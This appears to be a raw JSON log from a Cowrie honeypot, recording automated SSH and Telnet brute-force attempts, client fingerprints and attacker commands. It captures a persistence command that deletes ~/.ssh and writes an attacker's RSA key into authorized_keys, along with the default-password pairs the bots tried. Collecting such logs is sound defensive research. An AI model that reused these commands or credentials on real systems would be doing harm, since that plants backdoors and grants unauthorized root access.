{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:29:13.463784Z","src_ip":"212.227.235.229","session":"4fbddb7c7d58"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:13.464666Z","src_ip":"212.227.235.229","session":"4fbddb7c7d58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43366,"dst_ip":"1.2.3.4","dst_port":22,"session":"7545eb402f93","protocol":"ssh","message":"New connection: 212.227.235.229:43366 (1.2.3.4:22) [session: 7545eb402f93]","sensor":"my-vps","timestamp":"2025-08-31T05:29:13.737251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:29:13.738129Z","src_ip":"212.227.235.229","session":"7545eb402f93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:29:14.012607Z","src_ip":"212.227.235.229","session":"7545eb402f93"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:29:15.151538Z","src_ip":"212.227.235.229","session":"7545eb402f93"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:16.428937Z","src_ip":"212.227.235.229","session":"7545eb402f93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44564,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f49ddda6e63","protocol":"ssh","message":"New connection: 212.227.235.229:44564 (1.2.3.4:22) [session: 7f49ddda6e63]","sensor":"my-vps","timestamp":"2025-08-31T05:29:16.701050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:29:16.701906Z","src_ip":"212.227.235.229","session":"7f49ddda6e63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:29:16.974915Z","src_ip":"212.227.235.229","session":"7f49ddda6e63"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:29:18.110711Z","src_ip":"212.227.235.229","session":"7f49ddda6e63"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:18.385150Z","src_ip":"212.227.235.229","session":"4fbddb7c7d58"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:18.385969Z","src_ip":"212.227.235.229","session":"7f49ddda6e63"}
{"eventid":"cowrie.login.success","username":"root","password":"wishes","message":"login attempt [root/wishes] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:29:21.266347Z","src_ip":"212.227.125.160","session":"5365840746c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:29:24.048904Z","src_ip":"212.227.125.160","session":"5365840746c0"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T05:29:24.049751Z","src_ip":"212.227.125.160","session":"5365840746c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:25.156559Z","src_ip":"212.227.125.160","session":"5365840746c0"}
{"eventid":"cowrie.session.closed","duration":"13.6","message":"Connection lost after 13.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:25.157923Z","src_ip":"212.227.125.160","session":"5365840746c0"}
{"eventid":"cowrie.session.closed","duration":"27.0","message":"Connection lost after 27.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:25.377446Z","src_ip":"212.227.125.160","session":"2e1abfffac2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60330,"dst_ip":"1.2.3.4","dst_port":22,"session":"de143ff67af7","protocol":"ssh","message":"New connection: 212.227.125.160:60330 (1.2.3.4:22) [session: de143ff67af7]","sensor":"my-vps","timestamp":"2025-08-31T05:29:25.697051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:29:26.043402Z","src_ip":"212.227.125.160","session":"de143ff67af7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:29:26.044467Z","src_ip":"212.227.125.160","session":"de143ff67af7"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:29:28.307082Z","src_ip":"212.227.125.160","session":"de143ff67af7"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:29.870017Z","src_ip":"212.227.125.160","session":"de143ff67af7"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":50932,"dst_ip":"1.2.3.4","dst_port":22,"session":"5835572daf5d","protocol":"ssh","message":"New connection: 201.148.180.50:50932 (1.2.3.4:22) [session: 5835572daf5d]","sensor":"my-vps","timestamp":"2025-08-31T05:29:31.716291Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44093,"dst_ip":"1.2.3.4","dst_port":23,"session":"5f5c2e233ed0","protocol":"telnet","message":"New connection: 212.227.235.229:44093 (1.2.3.4:23) [session: 5f5c2e233ed0]","sensor":"my-vps","timestamp":"2025-08-31T05:29:33.739037Z"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-31T05:29:34.279275Z","src_ip":"212.227.235.229","session":"a1c03df960e8"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:36.061858Z","src_ip":"201.148.180.50","session":"5835572daf5d"}
{"eventid":"cowrie.session.closed","duration":"79.6","message":"Connection lost after 79.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:41.478697Z","src_ip":"212.227.235.229","session":"a1c03df960e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58128,"dst_ip":"1.2.3.4","dst_port":22,"session":"223e3797b0e3","protocol":"ssh","message":"New connection: 212.227.235.229:58128 (1.2.3.4:22) [session: 223e3797b0e3]","sensor":"my-vps","timestamp":"2025-08-31T05:29:46.771036Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42132,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d7c665c29b5","protocol":"ssh","message":"New connection: 212.227.235.229:42132 (1.2.3.4:22) [session: 4d7c665c29b5]","sensor":"my-vps","timestamp":"2025-08-31T05:29:48.711965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:29:48.712998Z","src_ip":"212.227.235.229","session":"4d7c665c29b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:29:48.805110Z","src_ip":"212.227.235.229","session":"4d7c665c29b5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"112","message":"login attempt [admin/112] failed","sensor":"my-vps","timestamp":"2025-08-31T05:29:49.215389Z","src_ip":"212.227.235.229","session":"4d7c665c29b5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:50.310157Z","src_ip":"212.227.235.229","session":"4d7c665c29b5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:29:51.710465Z","src_ip":"212.227.235.229","session":"223e3797b0e3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:29:51.711281Z","src_ip":"212.227.235.229","session":"223e3797b0e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52290,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb38b0f11bfd","protocol":"ssh","message":"New connection: 212.227.235.229:52290 (1.2.3.4:22) [session: fb38b0f11bfd]","sensor":"my-vps","timestamp":"2025-08-31T05:30:00.643029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:30:00.645359Z","src_ip":"212.227.235.229","session":"fb38b0f11bfd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:30:00.901036Z","src_ip":"212.227.235.229","session":"fb38b0f11bfd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63194,"dst_ip":"1.2.3.4","dst_port":22,"session":"41dfb7f4d703","protocol":"ssh","message":"New connection: 217.72.205.35:63194 (1.2.3.4:22) [session: 41dfb7f4d703]","sensor":"my-vps","timestamp":"2025-08-31T05:30:01.845157Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:01.847550Z","src_ip":"217.72.205.35","session":"41dfb7f4d703"}
{"eventid":"cowrie.login.success","username":"root","password":"idc@123","message":"login attempt [root/idc@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:30:01.900353Z","src_ip":"212.227.235.229","session":"fb38b0f11bfd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:30:02.420705Z","src_ip":"212.227.235.229","session":"fb38b0f11bfd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:30:02.421655Z","src_ip":"212.227.235.229","session":"fb38b0f11bfd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:30:02.423328Z","src_ip":"212.227.235.229","session":"fb38b0f11bfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49066,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9e65d39162a","protocol":"ssh","message":"New connection: 212.227.235.229:49066 (1.2.3.4:22) [session: e9e65d39162a]","sensor":"my-vps","timestamp":"2025-08-31T05:30:02.671781Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:02.678641Z","src_ip":"212.227.235.229","session":"fb38b0f11bfd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:30:03.239224Z","src_ip":"212.227.235.229","session":"fb38b0f11bfd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:30:03.239917Z","src_ip":"212.227.235.229","session":"fb38b0f11bfd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:30:03.404453Z","src_ip":"212.227.235.229","session":"e9e65d39162a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:30:03.405197Z","src_ip":"212.227.235.229","session":"e9e65d39162a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:30:03.493607Z","src_ip":"212.227.235.229","session":"fb38b0f11bfd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:03.494902Z","src_ip":"212.227.235.229","session":"fb38b0f11bfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53682,"dst_ip":"1.2.3.4","dst_port":22,"session":"704ea76c9dc3","protocol":"ssh","message":"New connection: 212.227.235.229:53682 (1.2.3.4:22) [session: 704ea76c9dc3]","sensor":"my-vps","timestamp":"2025-08-31T05:30:03.753121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:30:03.754155Z","src_ip":"212.227.235.229","session":"704ea76c9dc3"}
